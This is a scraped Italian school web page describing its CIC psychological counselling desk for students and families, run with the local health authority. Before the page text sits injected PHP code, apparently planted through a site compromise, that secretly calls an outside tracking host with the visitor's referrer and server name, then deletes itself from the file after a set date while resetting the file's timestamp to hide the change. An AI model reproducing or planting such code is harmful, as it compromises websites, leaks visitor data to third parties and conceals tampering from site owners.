check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Supporto Psicologico
Get Adobe Flash player

Nuovo sito

nuovosito 1

Supporto Psicologico

sportello CIC - centro informazione e consulenza

(a norma della l. 162/90)

In entrambe le scuole che oggi confluiscono nel nostro Istituto, l'attenzione verso le difficoltà giovanili - il disagio e qualunque forma di fragilità psicologica o anche solo emotiva - è sempre stata molto alta.

La varietà dei corsi, dagli studi artistici a quelli di carattere tecnico-scientifico, permettono agli studenti di cercare tante fome di relazione interpersonale e di espressione di sé. E comunque nell'Istituto è attivo un supporto psicologico strutturato che prevede la presenza periodica di uno specialista, presso il quale gli allievi possono recarsi nel pieno rispetto della loro privatezza. 

ll nostro sportello di ascolto CIC, affidato ad un ottimo specialista psicologo, dott. Pierlorenzi, e coordinato dalla prof. Manuela Cavagna che da anni segue il progetto con passione e cura, è attivo dal mese di novembre ed è aperto a tutta la comunità scolastica, anche alle famiglie che ne facciano richiesta.

Il progetto CIC è frutto di un accordo tra l'Azienda USL Roma C e la Regione Lazio, con l'U.O.C.- prevenzione e cura delle tossicodipendenze del Distretto 12.

L'obiettivo che perseguiamo, in accordo con gli enti citati, è quello di istituire una spazio privato, messo a disposizione degli studenti e carato sulla base dei bisogni primari che sono emersi nel corso di questi anni, in cui siano stimolati e promossi:

  • il benessere psicofisico degli allievi
  • la loro consapevolezza critica
  • il piacere e le ragioni dell'apprendimento

Il CIC non è solo consulenza e aiuto, ma svolge anche un fondamentale ruolo di prevenzione al disagio, alle difficoltà relazionali (tra studenti, tra studenti e docenti, tra giovani e famiglia, ecc. ) a qualunque tipo di fragilità interiore, e può significativamente collaborare a vivere una vita scolastica più serena, consapevole e fruttuosa.

FB